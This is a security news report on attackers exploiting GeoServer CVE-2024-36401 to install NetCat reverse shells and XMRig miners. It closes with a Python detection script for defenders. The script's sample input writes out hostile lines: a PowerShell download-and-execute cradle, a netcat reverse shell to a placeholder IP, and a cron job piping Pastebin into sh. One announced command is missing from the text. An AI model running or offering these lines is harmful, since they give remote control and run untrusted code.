The AhnLab Security Intelligence Center (ASEC) has issued a fresh warning on the ongoing exploitation of a remote code execution (RCE) vulnerability in GeoServer, tracked as CVE-2024-36401. According to ASEC, this flaw continues to be abused in active campaigns targeting both Windows and Linux environments, with attackers deploying NetCat reverse shells and XMRig CoinMiners to hijack system resources and maintain control over compromised servers.
“ASEC has confirmed that the unpatched GeoServer is still under continuous attack. Threat actors are scanning for vulnerable GeoServer and installing CoinMiner,” the report states.
GeoServer is a widely used open-source Geographic Information System (GIS) server written in Java. It allows users to share and process spatial data across the web. But this powerful utility became a prime target when researchers disclosed a serious RCE vulnerability (CVE-2024-36401) that enables unauthorized remote code execution on exposed servers.
Since its disclosure, multiple cyber threat actors have integrated the GeoServer vulnerability into their toolkits. Fortinet had previously reported that malware families such as GOREVERSE, SideWalk, Mirai, Condi, and CoinMiner were being dropped using this exploit. Trend Micro also noted spear-phishing campaigns by the Earth Baxia group targeting Taiwanese government agencies using the same flaw.
ASEC detailed one particular campaign in South Korea, where unpatched versions of GeoServer were compromised in Windows environments. Attackers initiated their campaign by executing PowerShell commands that downloaded malicious scripts to deploy NetCat and XMRig.
The infection begins with a script named adminc.ps1, which installs NetCat. While NetCat is a legitimate network utility, threat actors weaponize it to create reverse shells, allowing them to issue remote commands as if they were sitting at the console of the infected machine.
“The NetCat executed via the ‘-e’ argument connects to the C&C server and operates as a reverse shell, allowing the threat actor to control the infected system,” ASEC noted.
Next, attackers deploy XMRig, an open-source Monero mining tool. The malicious PowerShell command fetches the payload from an external site using:
This script installs XMRig and configures it to mine Monero using the compromised system’s CPU cycles.
In Linux environments, attackers use bash scripts that terminate rival mining processes, execute startup.sh, and add malicious entries to the system’s cron scheduler for persistence. These cron jobs point to payloads hosted on Pastebin, keeping the infection alive across reboots.
Organizations using GeoServer are urged to:
- Update to the latest patched version immediately
- Audit systems for suspicious PowerShell or bash activity
- Check for unusual CPU usage patterns
- Monitor outbound traffic for connections to mining pools or C&C servers
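As an added example (not code from the ASEC report or this article), the small Python triage helper below scans a process listing and crontab lines for the behaviours described above: NetCat run with `-e`, XMRig, cron jobs pulling from Pastebin, and PowerShell download cradles. The sample lines, hostnames and the "rival miner kill sweep" pattern are constructed assumptions for illustration, not captured indicators.

```python
"""Triage helper: flag process command lines and cron entries matching the
post-exploitation behaviour ASEC describes for CVE-2024-36401 campaigns.
All sample input below is constructed for illustration, not a real capture."""
import re

# Each rule: (label, compiled regex). The first four mirror the report's
# indicators; the kill-sweep rule is an assumed pattern for the "terminate
# rival mining processes" step, since the report names no specific processes.
RULES = [
    ("netcat_reverse_shell", re.compile(r"\b(nc|ncat|netcat)(\.exe)?\b.*\s-e\s", re.I)),
    ("xmrig_miner", re.compile(r"\bxmrig\b|--donate-level|stratum\+tcp://", re.I)),
    ("pastebin_cron_persistence", re.compile(r"pastebin\.com/raw/", re.I)),
    ("powershell_download_cradle",
     re.compile(r"powershell.*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b)", re.I)),
    ("rival_miner_kill_sweep", re.compile(r"\b(pkill|killall)\b.*\b(xmr|miner)", re.I)),
]

def classify(line: str) -> list[str]:
    """Return every rule label the line matches (empty list if nothing fires)."""
    return [label for label, rx in RULES if rx.search(line)]

def triage(lines: list[str]) -> dict[str, list[str]]:
    """Map each matched rule label to the input lines that triggered it."""
    hits: dict[str, list[str]] = {}
    for line in lines:
        for label in classify(line):
            hits.setdefault(label, []).append(line.strip())
    return hits

# Constructed sample: a mixed process listing plus crontab lines (hosts are
# reserved example/documentation addresses, the wallet is a placeholder).
SAMPLE = [
    "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/adminc.ps1')",
    "C:\\Windows\\Temp\\nc.exe 203.0.113.5 4444 -e cmd.exe",
    "/tmp/.x/xmrig -o pool.example.invalid:3333 -u WALLET_PLACEHOLDER --donate-level 0",
    "* * * * * curl -fsSL https://pastebin.com/raw/EXAMPLEID | sh",
    "pkill -f xmr; pkill -f minerd",
    "/usr/bin/java -jar /opt/geoserver/start.jar",
    "0 3 * * * /usr/bin/apt-get update",
]

if __name__ == "__main__":
    for label, matched in triage(SAMPLE).items():
        print(f"[{label}]")
        for m in matched:
            print("   ", m)
```

Feed it the output of `ps -eo args` or `Get-CimInstance Win32_Process` plus every user's crontab; anything it flags on a GeoServer host deserves a manual look at the parent process and outbound connections.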